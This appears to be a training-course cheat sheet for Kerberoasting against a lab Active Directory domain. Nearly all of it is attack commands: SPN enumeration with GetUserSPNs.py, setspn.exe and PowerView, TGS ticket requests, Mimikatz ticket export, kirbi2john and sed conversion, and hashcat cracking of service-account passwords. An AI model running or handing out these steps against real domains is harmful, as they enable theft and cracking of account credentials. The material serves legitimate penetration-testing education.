Kerberoasting

Kerberoasting Commands

Install Impacket

• Command:

sudo python3 -m pip install .

• Description: Used to install Impacket from inside the directory that gets cloned to the attack host. Performed from a Linux-based host.

Display GetUserSPNs.py Options

• Command:

GetUserSPNs.py -h

• Description: Impacket tool used to display the options and functionality of GetUserSPNs.py from a Linux-based host.

Get List of SPNs on Target Domain

• Command:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday

• Description: Impacket tool used to get a list of SPNs on the target Windows domain from a Linux-based host.

Request All TGS Tickets for Offline Processing

• Command:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request

• Description: Impacket tool used to download/request all TGS tickets for offline processing from a Linux-based host.

Request TGS Ticket for a Specific User

• Command:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev

• Description: Impacket tool used to download/request a TGS ticket for a specific user account (sqldev) from a Linux-based host.

Request TGS Ticket for a Specific User and Write to File

• Command:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev -outputfile sqldev_tgs

• Description: Impacket tool used to download/request a TGS ticket for a specific user account and write the ticket to a file (sqldev_tgs) from a Linux-based host.

Crack Kerberos Ticket Hash with Hashcat

• Command:

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt --force

• Description: Attempts to crack the Kerberos (-m 13100) ticket hash (sqldev_tgs) using hashcat and a wordlist (rockyou.txt) from a Linux-based host.

Enumerate SPNs in a Windows Domain

• Command:

setspn.exe -Q */*

• Description: Used to enumerate SPNs in a target Windows domain from a Windows-based host.

Download TGS Ticket for a Specific User with PowerShell

• Command:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRESQL.inlanefreight.local:1433"

• Description: PowerShell script used to download/request the TGS ticket of a specific user from a Windows-based host.

Request All TGS Tickets from Windows Domain

• Command:

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

• Description: Used to download/request all TGS tickets from a Windows-based host.

Extract TGS Tickets in Base64 Format with Mimikatz

• Command:

mimikatz # base64 /out:true

• Description: Mimikatz command that ensures TGS tickets are extracted in base64 format from a Windows-based host.

Extract TGS Tickets with Mimikatz

• Command:

kerberos::list /export

• Description: Mimikatz command used to extract the TGS tickets from a Windows-based host.

Prepare Base64 Formatted TGS Ticket for Cracking

• Command:

echo "<base64 blob>" | tr -d \n

• Description: Used to prepare the base64 formatted TGS ticket for cracking from a Linux-based host.

Convert Encoded File to .kirbi Format

• Command:

cat encoded_file | base64 -d > sqldev.kirbi

• Description: Used to output a file (encoded_file) into a .kirbi file in base64 format from a Linux-based host.

Extract Kerberos Ticket with kirbi2john

• Command:

python2.7 kirbi2john.py sqldev.kirbi

• Description: Used to extract the Kerberos ticket. This also creates a file called crack_file from a Linux-based host.

Modify Crack File for Hashcat

• Command:

sed 's/\$krb5tgs\$(.*):(.*)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

• Description: Used to modify the crack_file for Hashcat from a Linux-based host.

View Prepared Hash

• Command:

cat sqldev_tgs_hashcat

• Description: Used to view the prepared hash from a Linux-based host.

Crack Kerberos Ticket Hash with Hashcat

• Command:

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

• Description: Used to crack the prepared Kerberos ticket hash (sqldev_tgs_hashcat) using a wordlist (rockyou.txt) from a Linux-based host.

Extract TGS Tickets with PowerView

• Command:

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

• Description: Uses PowerView tool to extract TGS Tickets. Performed from a Windows-based host.

Request Specific User's TGS Ticket in Hashcat Format

• Command:

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

• Description: PowerView tool used to download/request the TGS ticket of a specific ticket and automatically format it for Hashcat from a Windows-based host.